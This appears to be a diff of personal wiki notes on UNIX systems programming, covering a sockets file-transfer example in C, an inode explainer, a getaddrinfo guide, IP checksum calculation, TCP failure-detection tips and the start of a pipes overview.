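After obtaining a socket descriptor, the client uses this call to connect to the server. socketfd is the socket descriptor returned by socket(); the second and third arguments are a pointer to the destination address structure and the length of that address in bytes (the destination here is the server's address). The call returns 0 on success; otherwise it returns -1 and sets errno.
6. Sending data through the socket
Once the connection is established, the read and write system calls can send and receive data over the network just as with ordinary files. read takes three arguments: the socket descriptor, the buffer to be filled with data, and an integer giving the number of bytes to read. It returns the number of bytes actually read, -1 on error, and 0 at end of file. write also takes three arguments: the socket descriptor, a pointer to the buffer holding the data to send, and an integer giving the number of bytes to write. It returns the number of bytes actually written, or -1 on error. send and recv can also be used to write to and read from a socket; they work like read and write but take one additional flags argument.
7. When the program exits, it should close the socket properly. Format:
int close(socketfd)
That covers the basic approach and steps of client/server network programming on UNIX. Note that on this system the socket calls are not part of the basic system call set; they are implemented in the library libsocket.a, so the -lsocket option is needed when compiling the source with cc.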
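The seven steps above can be sketched in one function that plays both roles on the loopback interface. This is only an illustration under stated assumptions: the name loopback_roundtrip is invented here, the address is 127.0.0.1 rather than the article's server host, port 0 is used so the kernel picks a free port, and a single process acts as both client and server.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

/* Run socket/bind/listen/connect/accept/write/read/close once on the
 * loopback interface, inside a single process.
 * Returns the number of bytes received into buf, or -1 on any failure. */
int loopback_roundtrip(const char *msg, char *buf, size_t buflen)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    int ls = -1, cs = -1, as = -1, n = -1;

    assert(msg != NULL && buf != NULL);
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = htons(0);                /* 0 lets the kernel pick a free port */

    ls = socket(AF_INET, SOCK_STREAM, 0);    /* step 1 (server) */
    if (ls < 0) goto done;
    if (bind(ls, (struct sockaddr *)&addr, sizeof(addr)) < 0) goto done; /* step 2 */
    if (listen(ls, 5) < 0) goto done;                                    /* step 3 */
    if (getsockname(ls, (struct sockaddr *)&addr, &len) < 0) goto done;  /* learn the port */

    cs = socket(AF_INET, SOCK_STREAM, 0);    /* step 1 (client) */
    if (cs < 0) goto done;
    /* The kernel completes the handshake against the listen queue,
       so connect() can return before accept() is called. */
    if (connect(cs, (struct sockaddr *)&addr, sizeof(addr)) < 0) goto done; /* step 5 */
    as = accept(ls, NULL, NULL);             /* step 4; peer address not needed */
    if (as < 0) goto done;

    if (write(cs, msg, strlen(msg)) != (ssize_t)strlen(msg)) goto done;  /* step 6 */
    n = (int)read(as, buf, buflen);

done:                                        /* step 7 */
    if (as >= 0) close(as);
    if (cs >= 0) close(cs);
    if (ls >= 0) close(ls);
    return n;
}
```

A real server and client would live in separate processes, as in the fwq.c and khj.c programs; folding them together here only keeps the sketch short.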
|
||||
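Now we can write a program for the problem raised at the start of the article. In the network shown in the figure, for the server in the central machine room to communicate with the clients at the branches, a route to the clients through router 1112 must be added on the server, and both clients must add a route to the server through router 2221. The server's /etc/hosts file should contain the following:
1.1.1.1 server
2.2.2.2 cli1
2.2.2.3 cli2
Each client's /etc/hosts file should contain the address of the local machine and the address of the server, for example on client cli1:
2.2.2.2 cli1
1.1.1.1 server
With the network environment in place, we write the program fwq.c on the server. It accepts connection requests from clients and sends the data read from the source file to the client. The client program khj.c sends a connection request to the server, receives the data sent by the server, and writes it to the target file. The source follows: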
|
||||
/* Server source: fwq.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
int main(void)
{
    char buf[1024],file[30];
    socklen_t fromlen;
    int source;
    int k,s,ns;
    struct sockaddr_in sin,peer;
    struct hostent *hp;
    system("clear");
    printf("\n");

    printf("\n\n\t\tEnter the name of the file to send: ");
    memset(file,0,sizeof(file)); /* the whole 30-byte field is sent to the client */
    if(scanf("%29s",file)!=1)
        exit(1);
    if((source=open(file,O_RDONLY))<0){
        perror("cannot open the source file");
        exit(1);
    }
    printf("\n\t\tSending the file, please wait...");
    hp=gethostbyname("server");
    if(hp==NULL){
        fprintf(stderr,"cannot get the host address information\n");
        exit(2);
    }
    s=socket(AF_INET,SOCK_STREAM,0);
    if(s<0){
        perror("cannot create the socket");
        exit(3);
    }
    memset(&sin,0,sizeof(sin));
    sin.sin_family=AF_INET;
    sin.sin_port=htons(1500); /* use port 1500 */
    memcpy(&sin.sin_addr,hp->h_addr,hp->h_length);
    if(bind(s,(struct sockaddr *)&sin,sizeof(sin))<0){
        perror("cannot bind the server address to the socket");
        close(s);
        exit(4);
    }
    if(listen(s,5)<0){
        perror("server:listen");
        exit(5);
    }
    while(1){
        fromlen=sizeof(peer); /* accept needs the buffer size on entry */
        if((ns=accept(s,(struct sockaddr *)&peer,&fromlen))<0){
            perror("server:accept");
            exit(6);
        }
        lseek(source,0L,SEEK_SET); /* rewind the source file for every client connection */
        write(ns,file,sizeof(file)); /* send the file name */
        while((k=read(source,buf,sizeof(buf)))>0)
            write(ns,buf,k);
        printf("\n\n\t\tTransfer complete!\n");
        close(ns);
    }
    close(source);
    exit(0);
}
|
||||
/* Client source: khj.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
int main(void)
{
    char buf[1024],file[30];
    char strs[128]="\n\n\t\tReceiving file "; /* an array, so strcat can append to it */
    int target;
    int k,s;
    size_t got=0;
    struct sockaddr_in sin;
    struct hostent *hp;
    system("clear");
    printf("\n");

    hp=gethostbyname("server");
    if(hp==NULL){
        fprintf(stderr,"cannot get the server address information\n");
        exit(1);
    }
    s=socket(AF_INET,SOCK_STREAM,0);
    if(s<0){
        perror("cannot create the socket");
        exit(2);
    }
    memset(&sin,0,sizeof(sin));
    sin.sin_family=AF_INET;
    sin.sin_port=htons(1500); /* the port must match the one used by the server */
    memcpy(&sin.sin_addr,hp->h_addr,hp->h_length);
    printf("\n\n\t\tConnecting to the server...");
    if(connect(s,(struct sockaddr *)&sin,sizeof(sin))<0){
        perror("cannot connect to the server");
        exit(3);
    }
    /* receive the fixed-size file name field; one read may return only part of it */
    while(got<sizeof(file)){
        k=read(s,file+got,sizeof(file)-got);
        if(k<=0){
            fprintf(stderr,"cannot receive the file name\n");
            exit(4);
        }
        got+=k;
    }
    file[sizeof(file)-1]='\0';
    if((target=open(file,O_WRONLY|O_CREAT|O_TRUNC,0644))<0){
        perror("cannot open the target file");
        exit(4);
    }
    strcat(strs,file);
    strcat(strs,", please wait...");
    write(1,strs,strlen(strs));
    while((k=read(s,buf,sizeof(buf)))>0)
        write(target,buf,k);
    printf("\n\n\t\tFile received successfully!\n");
    close(s);
    close(target);
    return 0;
}
|
||||
The original programs were debugged and run under SCO UNIX System V 3.2 with the SCO TCP/IP Runtime.
|
||||
94
Zim/Programme/APUE/What’s_an_inode.txt
Normal file
@@ -0,0 +1,94 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-10T00:08:47+08:00
|
||||
|
||||
====== What’s an inode ======
|
||||
Created Friday 10 June 2011
|
||||
http://www.linux-mag.com/id/8658/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+LinuxMagazine+%28Linux+Magazine%3A+Top+Stories%29
|
||||
In the electronic pages of Linux Magazine, file systems are commonly discussed. It’s a fact! In these discussions you might see the term “inode” used in reference to a file system. Fairly often people ask the question, “what is an inode?” so that they can understand the discussion (remember, there is no such thing as a bad question – at least for the most part).
|
||||
|
||||
To many people who read these storage articles this might seem like an elementary question but for many people just starting in Linux this concept may not be understood. Plus it’s always good to review the concept but let’s keep any comments civil and constructive (especially if they are directed at the author). Let me also state that I’m not a file system expert so please correct any misstatements but also please give references so people reading the comments can explore the topic.
|
||||
|
||||
File systems in general have two parts: (1) the metadata or the “data” about the data, and (2) the data itself. The first part, the metadata, may sound funny because it’s data about the data, but this is a very key component to file systems. It consists of information about the data. More precisely it includes information such as the name of the file, the date the file was modified, file owner, file permissions, etc. This type of information is key to a file system otherwise we just have a bunch of bits on the storage media that don’t mean much. Inodes store this metadata information and typically they also store information about where the data is located on the storage media.
|
||||
|
||||
inode
|
||||
|
||||
In general for *nix file systems, with each file or directory, there is an associated inode. As mentioned previously, this is where the metadata is stored and the inode is typically represented as an integer number. The origin of the term inode is not known with any certainty. From the wikipedia page about inodes, one of the original developers of Unix, Dennis Ritchie, said the following about the origin of the term inode:
|
||||
|
||||
In truth, I don’t know either. It was just a term that we started to use. “Index” is my best guess, because of the slightly unusual file system structure that stored the access information of files as a flat array on the disk, with all the hierarchical directory information living aside from this. Thus the i-number is an index in this array, the i-node is the selected element of the array. (The “i-” notation was used in the 1st edition manual; its hyphen was gradually dropped.)
|
||||
|
||||
How inodes are created and even if they are created, depends upon the specific file system. Several file systems create all of them when the file system is created resulting in a fixed number of inodes. For example, ext3 is a file system that does this. The result is that the file system has a fixed number of files that can be stored. Yes – it’s actually possible to have capacity on the storage and not be able to store any more data (it doesn’t happen often but it’s theoretically possible). If you need more inodes you have to remake the file system losing all data in the file system.
|
||||
|
||||
One way around the trap of a fixed number of inodes is some file systems use something called extents and/or dynamic inode allocation. These file systems can basically grow the file system and/or increase the number of inodes.
|
||||
|
||||
Inodes aren’t something mysterious that you should tiptoe past but rather something that is part of Linux. For example, you can look at the inode numbers of your files by simply using the “-i” option with “ls”. For example,
|
||||
|
||||
laytonjb@laytonjb-laptop:~/Documents/FEATURES/STORAGE088$ ls -il
|
||||
total 1024
|
||||
8847368 -rw-r--r-- 1 laytonjb laytonjb 115020 2011-04-24 07:33 Figure_1.png
|
||||
8847366 -rw-r--r-- 1 laytonjb laytonjb 39200 2011-04-24 07:38 Figure_2.png
|
||||
8847361 -rw-r--r-- 1 laytonjb laytonjb 30691 2011-04-24 07:40 Figure_3.png
|
||||
8847367 -rw-r--r-- 1 laytonjb laytonjb 28835 2011-04-24 07:42 Figure_4.png
|
||||
8847363 -rw-r--r-- 1 laytonjb laytonjb 115103 2011-04-24 07:43 Figure_5.png
|
||||
8847362 -rw-r--r-- 1 laytonjb laytonjb 125513 2011-04-24 07:44 Figure_6.png
|
||||
8847365 -rw-r--r-- 1 laytonjb laytonjb 77831 2011-04-24 07:44 Figure_7.png
|
||||
7790593 -rw-r--r-- 1 laytonjb laytonjb 15632 2011-04-26 19:40 storage088.html
|
||||
8847364 -rw-r--r-- 1 laytonjb laytonjb 183 2011-04-24 07:33 text1.txt
|
||||
3089319 drwxr-xr-x 2 laytonjb laytonjb 4096 2011-04-24 07:54 TRIM_WORKS
|
||||
5554211 -rw-r--r-- 1 laytonjb laytonjb 449110 2011-04-24 07:52 trim_works.tar.gz
|
||||
|
||||
|
||||
The number on the far left is the inode number associated with the file. Also notice that there is a directory “TRIM_WORKS” that also has an inode associated with it. Each time a file or directory is created or deleted, an inode is created or deleted.
|
||||
|
||||
Remember that in general, Linux is POSIX compliant which requires certain file attributes. In particular:
|
||||
|
||||
|
||||
The size of the file in bytes
|
||||
Device ID
|
||||
User ID of the file
|
||||
Group ID of the file
|
||||
The file mode that determines the file type and how the owner, group, and others (world) can access the file
|
||||
Additional system and user flags to further protect the file (note: these can be used to limit the file's use and modification)
Timestamps telling when the inode itself was last changed (ctime, change time), when the file content was last modified (mtime, modification time), and when the file was last accessed (atime, access time)
|
||||
A link counter that lists how many hard links point to the inode
|
||||
Pointers to the disk blocks that store the file’s contents (more on that later)
|
||||
|
||||
|
||||
Any Linux file system that is POSIX compliant must have this data contained in the inode for each file or be able to produce this information as though it had inodes. For example, ReiserFS does not use traditional inodes. Instead metadata, directory entries, inode block lists (more on that later), and tails of files are in a single combined B+ tree keyed by a universal object ID. So ReiserFS has to provide POSIX information when queried if it is to be considered POSIX compliant.
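These attributes are what the POSIX stat() call returns, so a short sketch can show them for any path. The function names print_inode_info and same_inode are invented for this example; only stat() and the struct stat fields come from POSIX.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Print the inode metadata that stat() exposes for path.
 * Returns 0 on success, -1 if stat() fails. */
int print_inode_info(const char *path)
{
    struct stat st;

    assert(path != NULL);
    if (stat(path, &st) < 0)
        return -1;
    printf("inode:   %llu\n", (unsigned long long)st.st_ino);
    printf("links:   %llu\n", (unsigned long long)st.st_nlink);
    printf("size:    %lld bytes\n", (long long)st.st_size);
    printf("mode:    %o\n", (unsigned)st.st_mode);
    printf("uid/gid: %u/%u\n", (unsigned)st.st_uid, (unsigned)st.st_gid);
    printf("mtime:   %lld\n", (long long)st.st_mtime);
    return 0;
}

/* Return 1 if both paths name the same inode on the same device
 * (for example two hard links to one file), 0 otherwise. */
int same_inode(const char *a, const char *b)
{
    struct stat sa, sb;

    if (stat(a, &sa) < 0 || stat(b, &sb) < 0)
        return 0;
    return sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}
```

The inode number printed here is the same one that appears in the first column of “ls -il”. Comparing both st_dev and st_ino matters because inode numbers are only unique within one file system.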
|
||||
|
||||
Inode Pointer Structure
|
||||
|
||||
In the POSIX definition of a file system, there is an item in the inode called an inode pointer structure. Remember that the inode just stores the metadata information including some sort of list of the blocks where the data is stored on the storage media. The inode pointer structure is the data structure universally used in the inode to list the blocks (or data blocks) associated with the file.
|
||||
|
||||
According to the wikipedia article, the structure used to have 11 or 13 pointers but most modern file systems use 15 pointers stored in the data structure. From wikipedia, for the case where there are 15 pointers in the data structure, the pointers are:
|
||||
|
||||
|
||||
Twelve pointers that directly point to blocks containing the data for the file. These are called direct pointers.
One singly indirect pointer. This pointer points to a block of pointers that point to blocks containing the data for the file.
One doubly indirect pointer. This pointer points to a block of pointers that point to other blocks of pointers that point to blocks containing the data for the file.
One triply indirect pointer. This pointer points to a block of pointers that point to other blocks of pointers that point to other blocks of pointers that point to blocks containing the data for the file.
|
||||
|
||||
|
||||
To make things easier, Figure 1 below from wikipedia, shows these different types of pointers.
|
||||
|
||||
|
||||
|
||||
{{./Ext2-inode.gif}}
|
||||
|
||||
|
||||
|
||||
|
||||
Figure 1: inode pointer structure (From wikipedia, Wikimedia Commons license)
|
||||
|
||||
|
||||
In the figure you can see the direct, indirect, and doubly indirect pointers. A triply indirect pointer is similar to the doubly indirect pointer with another level of pointers between the data blocks and the inode.
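A quick calculation shows how far this pointer scheme reaches. The sketch below counts addressable data blocks for twelve direct pointers plus one pointer at each indirection level; the function name max_data_blocks and the sample block and pointer sizes are assumptions for illustration, not values taken from the article.

```c
#include <assert.h>
#include <stdint.h>

/* Number of data blocks addressable with 12 direct pointers plus one
 * singly, one doubly and one triply indirect pointer. */
uint64_t max_data_blocks(uint64_t block_size, uint64_t ptr_size)
{
    uint64_t per_block;

    assert(ptr_size > 0 && block_size >= ptr_size);
    per_block = block_size / ptr_size;   /* pointers that fit in one block */
    return 12 + per_block
              + per_block * per_block
              + per_block * per_block * per_block;
}
```

With 1 KiB blocks and 4-byte pointers, each indirect block holds 256 pointers, giving 12 + 256 + 65,536 + 16,777,216 = 16,843,020 blocks, or roughly 16 GiB of file data. Real file systems may impose other limits that apply before this one.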
|
||||
|
||||
Summary
|
||||
|
||||
The concept of an inode is pretty fundamental to file systems within Linux and other *nix operating systems. Conceptually an inode is fairly easy to understand – it’s just the metadata about the data. That is, it contains information about the data itself that is very useful. For example it can contain the user and group owner of the file, the permissions on the file, and several time stamps. So when you execute commands in Linux, such as “ls”, the metadata of all the inodes involved is read and the information is collected and presented to the user.
|
||||
|
||||
Some file systems such as ext3 create all the inodes when the file system is created. Thus it is possible to be unable to store more files because all of the inodes are used even though the storage still has unused capacity. To help get around this, other file systems such as ext4 and xfs create inodes as needed.
|
||||
|
||||
Understanding the concept of an inode can be very useful. Armed with the basic concepts of inodes you can examine various file systems and determine which one is right for you. You can also use the concept of an inode to understand why something as simple as “ls -l” takes so long. Hint – look at how many files you have and how many inodes ls must query to gather the information.
|
||||
|
||||
Jeff Layton is an Enterprise Technologist for HPC at Dell. He can be found lounging around at a nearby Frys enjoying the coffee and waiting for sales (but never during working hours).
|
||||
BIN
Zim/Programme/APUE/What’s_an_inode/Ext2-inode.gif
Normal file
|
After Width: | Height: | Size: 3.1 KiB |
226
Zim/Programme/APUE/getaddrinfo.txt
Normal file
@@ -0,0 +1,226 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:55:47+08:00
|
||||
|
||||
====== getaddrinfo ======
|
||||
Created Thursday 21 April 2011
|
||||
http://blog168.chinaunix.net/space.php?uid=20196318&do=blog&id=172427
|
||||
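A Detailed Guide to Using getaddrinfo (2011-03-15 15:25)
Tags: getaddrinfo, sockets, host address conversion, service port conversion  Category: Socket network programming

getaddrinfo came about because the gethostbyname family of functions does not support IPv6. It handles both conversions, name to address and service to port, and returns a linked list of addrinfo structures. Each entry carries a sockaddr address structure that can be used directly with the socket functions (socket, bind, connect and so on), so the protocol dependence is hidden inside getaddrinfo. Prefer getaddrinfo to the older getXX family of functions, just as inet_ntop and inet_pton should be preferred to inet_aton, inet_addr and similar functions.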
|
||||
|
||||
|
||||
|
||||
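#include <netdb.h>

int getaddrinfo(const char* hostname, const char* service,
                const struct addrinfo* hints, struct addrinfo** result);

hostname can be a host name or an address string (an IPv4 dotted-decimal string or an IPv6 hexadecimal string); service is a service name or a decimal port number string. The system configuration files related to getaddrinfo include /etc/hosts and /etc/services, which are used to convert between host names and address strings and between service names and port numbers.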
|
||||
|
||||
|
||||
|
||||
/etc/hosts stores the mapping between addresses and host names, for example:
|
||||
|
||||
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
|
||||
|
||||
10.0.1.73 fedora11
|
||||
|
||||
|
||||
|
||||
/etc/services stores the mapping between services and port numbers, for example:
|
||||
|
||||
tcpmux 1/tcp # TCP port service multiplexer
|
||||
|
||||
tcpmux 1/udp # TCP port service multiplexer
|
||||
|
||||
rje 5/tcp # Remote Job Entry
|
||||
|
||||
rje 5/udp # Remote Job Entry
|
||||
|
||||
echo 7/tcp #TCP echo
|
||||
|
||||
echo 7/udp #UDP echo
|
||||
|
||||
|
||||
|
||||
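If your application uses a host name in place of an IP address, or a service name in place of a port number, the mapping must be resolvable first, for example by adding it to the corresponding configuration file; otherwise getaddrinfo fails to resolve it.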
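When both arguments are already numeric strings, no configuration-file entry is involved at all. A minimal sketch, assuming IPv4 only; resolve_numeric is a hypothetical helper name, and the AI_NUMERICHOST and AI_NUMERICSERV flags are used here to make getaddrinfo skip every name lookup:

```c
#include <assert.h>
#include <string.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>

/* Resolve a numeric IPv4 address string and a numeric port string
 * into *out. Returns 0 on success or a getaddrinfo() error code. */
int resolve_numeric(const char *host, const char *port, struct sockaddr_in *out)
{
    struct addrinfo hints, *res;
    int rc;

    assert(host != NULL && port != NULL && out != NULL);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_flags = AI_NUMERICHOST | AI_NUMERICSERV; /* no hosts, DNS or services lookup */

    rc = getaddrinfo(host, port, &hints, &res);
    if (rc != 0)
        return rc;                           /* pass to gai_strerror() for a message */
    memcpy(out, res->ai_addr, sizeof(*out)); /* the first result is enough here */
    freeaddrinfo(res);
    return 0;
}
```

With these flags a name such as "localhost" is rejected instead of being looked up, which makes the difference between numeric strings and names that need a mapping easy to observe.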
|
||||
|
||||
|
||||
|
||||
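With getaddrinfo it is easy to build server and client applications without worrying about byte order, address conversion and the like. tcp_listen obtains the sockaddr information from host and service, creates the socket, binds the address and listens. Likewise, tcp_connect connects to the server using the information returned by getaddrinfo. Creating UDP servers and clients is similar.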
|
||||
|
||||
|
||||
|
||||
int tcp_listen(const char* host, const char* serv)
{
    int listenfd, n;
    const int on = 1;
    struct addrinfo hints, *res, *ressave;

    bzero(&hints, sizeof(struct addrinfo));
    hints.ai_flags = AI_PASSIVE;
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;

    if((n = getaddrinfo(host, serv, &hints, &res)) != 0) {
        printf("tcp_listen error for %s, %s: %s\n",
               host, serv, gai_strerror(n));
        return -1;
    }

    ressave = res;
    do {
        listenfd = socket(res->ai_family, res->ai_socktype,
                          res->ai_protocol);
        if(listenfd < 0) {
            continue; /* error: try the next address */
        }

        setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));
        if(bind(listenfd, res->ai_addr, res->ai_addrlen) == 0) {
            break; /* success */
        }

        close(listenfd); /* bind failed: close and try the next address */
    }while((res = res->ai_next) != NULL);

    if(res == NULL) {
        /* n is 0 at this point, so report errno (needs <errno.h> and <string.h>) */
        printf("tcp_listen error for %s, %s: %s\n",
               host, serv, strerror(errno));
        freeaddrinfo(ressave);
        return -1;
    }

    listen(listenfd, BACK_LOG); /* BACK_LOG is assumed to be defined elsewhere, e.g. as 5 */

    freeaddrinfo(ressave);
    return(listenfd);
}
|
||||
|
||||
|
||||
|
||||
int tcp_connect(const char* host, const char* serv)
{
	int sockfd, n;
	struct addrinfo hints, *res, *ressave;

	bzero(&hints, sizeof(struct addrinfo));
	hints.ai_family = AF_INET;
	hints.ai_socktype = SOCK_STREAM;

	if((n = getaddrinfo(host, serv, &hints, &res)) != 0) {
		printf("tcp_connect error for %s, %s: %s\n",
			host, serv, gai_strerror(n));
		return -1;
	}

	ressave = res;
	do {
		sockfd = socket(res->ai_family, res->ai_socktype,
			res->ai_protocol);
		if(sockfd < 0) {
			continue;          /* try the next address */
		}

		if(connect(sockfd, res->ai_addr, res->ai_addrlen) == 0) {
			break;             /* success */
		}

		close(sockfd);         /* connect failed: close and try the next address */
	}while((res = res->ai_next) != NULL);

	if(res == NULL) {
		/* n is 0 here, so gai_strerror(n) would not describe the failure */
		printf("tcp_connect error for %s, %s: no usable address\n",
			host, serv);
		freeaddrinfo(ressave);
		return -1;
	}

	freeaddrinfo(ressave);
	return(sockfd);
}
|
||||
|
||||
|
||||
|
||||
49
Zim/Programme/APUE/how_do_i_calculate_a_checksum.txt
Normal file
@@ -0,0 +1,49 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T15:12:12+08:00
|
||||
|
||||
====== how do i calculate a checksum ======
|
||||
Created Sunday 05 June 2011
|
||||
|
||||
typedef struct ip_header{
|
||||
unsigned char headlen:4; // header len
|
||||
unsigned char ver:4; // version
|
||||
unsigned char tos; // type of service
|
||||
unsigned short length; // packet length
|
||||
unsigned short id; // ident
|
||||
unsigned short offset; // frag offset
|
||||
unsigned char ttl; // time to live
|
||||
unsigned char proto; // protocol
|
||||
unsigned short sum; // checksum
|
||||
unsigned int source; // source addr (32 bits; unsigned long would be 8 bytes on LP64 systems)
unsigned int dest; // dest addr (32 bits)
}IP_HEADER; /* 20 bytes */
|
||||
|
||||
|
||||
your question should be "how do i calculate a checksum" .... NOT "how do i convert a struct to a short".
|
||||
|
||||
the quick answer, is that you take your entire header and divide it into 2-byte "words", along their natural 16-bit boundaries, and perform a 1's complement addition on each word for a total checksum that is itself a 2-byte "word"
|
||||
|
||||
but before you do that, you've got a few potential problems, in that your header values do not align on the 16-bit boundaries.
|
||||
|
||||
your first two CHARs should not be individual 8-bit values, but should be concatenated into one total 8-bit value where VERSION is the 4 MSB's and HEADER LENGTH is the 4 LSB's. -- then that 8-bit value is itself concatenated with the TOS, where VERSION/HEADER are the 8 MSBs and the TOS is the 8 LSBs.
|
||||
|
||||
now you have your first "word"
|
||||
|
||||
LENGTH, ID, and OFFSET are your next three "words"... but it is important to note here that the first three (3) MSB's of the OFFSET are actually flag bits. (you may already know this and be handling it properly, but its not obvious from your structure.)
|
||||
|
||||
TTL and PROTOCOL are concatenated into the fifth "word", where TTL is the 8 MSB's and PROTOCOL is the 8 LSB's.
|
||||
|
||||
the HEADER CHECKSUM field will eventually be the sixth "word" --- but for purposes of calculating this checksum in the first place, you ignore this field at this time (or pretend it is all zeros)
|
||||
|
||||
DESTINATION and SOURCE IP ADDRESSES are split into two words each for a total of four (4) words
|
||||
|
||||
now you have a total of nine (9) 16-bit words that you will add together, in "1's complement" fashion.
|
||||
|
||||
once you find the 1's complement sum of the 9 words, you invert every bit of it (take its 1's complement) and put that 16-bit value in the checksum field.
|
||||
|
||||
and you're done.
|
||||
|
||||
|
||||
a final way to check this, that you've done it correctly -- and this is what is checked at each internet "hop" -- is that the 10 words of the IP header (including the checksum), all add up to 0xFFFF when added together in 1's complement fashion.
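The procedure above can be sketched as follows. This is an illustration under assumptions, not the poster's code: the function name ip_checksum is hypothetical, and it works on the raw header bytes as they appear on the wire rather than on the struct, which sidesteps the alignment and bit-field issues mentioned earlier.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: one's-complement checksum over an IP header.
 * hdr points at the raw header bytes in wire order; len is the header
 * length in bytes (20 without options). With the checksum field zeroed
 * this returns the value to store in that field; over a header that
 * already contains a correct checksum it returns 0. */
uint16_t ip_checksum(const uint8_t *hdr, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)hdr[i] << 8) | hdr[i + 1];   /* big-endian 16-bit word */
    if (len & 1)
        sum += (uint32_t)hdr[len - 1] << 8;            /* odd trailing byte */

    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);            /* end-around carry */

    return (uint16_t)~sum;                             /* final bit inversion */
}
```

The value is returned in host order; when writing it into the header, store the high byte first.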
|
||||
|
||||
BIN
Zim/Programme/APUE/linux-file-struct.gif
Normal file
|
After Width: | Height: | Size: 5.4 KiB |
17
Zim/Programme/APUE/note.txt
Normal file
@@ -0,0 +1,17 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-02T22:14:44+08:00
|
||||
|
||||
====== note ======
|
||||
Created Thursday 02 June 2011
|
||||
|
||||
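I want the program to detect immediately that the network is down when a network failure occurs, for example when the cable is unplugged.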
|
||||
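My idea is to have every send push the data onto the network immediately instead of letting it wait in the system send buffer, and to have the peer acknowledge as soon as it receives the data. Then, once the cable is unplugged, either the data cannot be sent or no reply comes back. Can this be done with the existing socket API by changing socket options? (The environment is RedHat Linux on Ethernet.) Windows seems to detect an unplugged cable immediately.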
|
||||
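The existing TCP/IP stack only guarantees reliable transport; it does not guarantee the reliability of application-level transactions. The application has to provide that itself (for example with receive acknowledgements + retransmission + heartbeat checks).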
|
||||
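You probably cannot control the actual transmission directly. Even after the TCP/IP data has been handed down, the layer-2 protocol has to check whether the transmission medium is available; if it is, the data is sent, otherwise it has to wait.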
|
||||
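Use select with a timeout. If the socket is ready, send the data. If send returns fewer bytes than you wanted to send, check whether the timeout has expired: if it has, report a send failure; otherwise keep sending during the remaining time. This ensures that the call returns success only after all of your data has been handed over.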
|
||||
|
||||
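TCP buffers data because of flow control and the Nagle algorithm. Flow control cannot be avoided; it depends on the network. What you can do is disable the Nagle algorithm by setting the TCP_NODELAY option with setsockopt.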
|
||||
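Detecting an unplugged cable is a feature of the NIC driver. But because a network failure can happen anywhere along the path, TCP does not drop the connection (otherwise TCP would be unusable). TCP keepalive (the SO_KEEPALIVE socket option) is one approach, but the default idle time is long, typically 7200 s. So the better approach is still an application-level heartbeat. Immediate detection is of course impossible; network latency and similar factors must be taken into account.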
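A minimal sketch of the two socket options mentioned above, assuming Linux: the helper name tune_tcp_socket is hypothetical, and TCP_KEEPIDLE, TCP_KEEPINTVL and TCP_KEEPCNT are Linux-specific options that shorten the keepalive timers for one socket. It does not replace an application-level heartbeat.

```c
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>

/* Hypothetical helper: disable Nagle and enable keepalive probing on fd.
 * idle     - seconds of silence before the first probe
 * interval - seconds between probes
 * count    - unanswered probes before the connection is reported dead
 * Returns 0 on success, -1 if any setsockopt call fails. */
int tune_tcp_socket(int fd, int idle, int interval, int count)
{
    int on = 1;

    if (setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &on, sizeof(on)) < 0)
        return -1;
    if (setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof(on)) < 0)
        return -1;
    /* Linux-specific per-socket keepalive timers */
    if (setsockopt(fd, IPPROTO_TCP, TCP_KEEPIDLE, &idle, sizeof(idle)) < 0)
        return -1;
    if (setsockopt(fd, IPPROTO_TCP, TCP_KEEPINTVL, &interval, sizeof(interval)) < 0)
        return -1;
    if (setsockopt(fd, IPPROTO_TCP, TCP_KEEPCNT, &count, sizeof(count)) < 0)
        return -1;
    return 0;
}
```

With idle=10, interval=5 and count=3 a dead peer would be noticed after roughly 10 + 3*5 seconds of silence, which is still far from immediate.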
|
||||
64
Zim/Programme/APUE/overview_of_pipes_and_FIFOs.txt
Normal file
@@ -0,0 +1,64 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-26T12:59:15+08:00
|
||||
|
||||
====== overview of pipes and FIFOs ======
|
||||
Created Sunday 26 February 2012
|
||||
|
||||
http://linux.die.net/man/7/pipe
|
||||
|
||||
===== Description =====
|
||||
__Pipes__ and __FIFOs__ (also known as named pipes) provide **a unidirectional interprocess communication channel.** A pipe has a read end and a write end. Data written to the write end of a pipe can be read from the read end of the pipe.
|
||||
|
||||
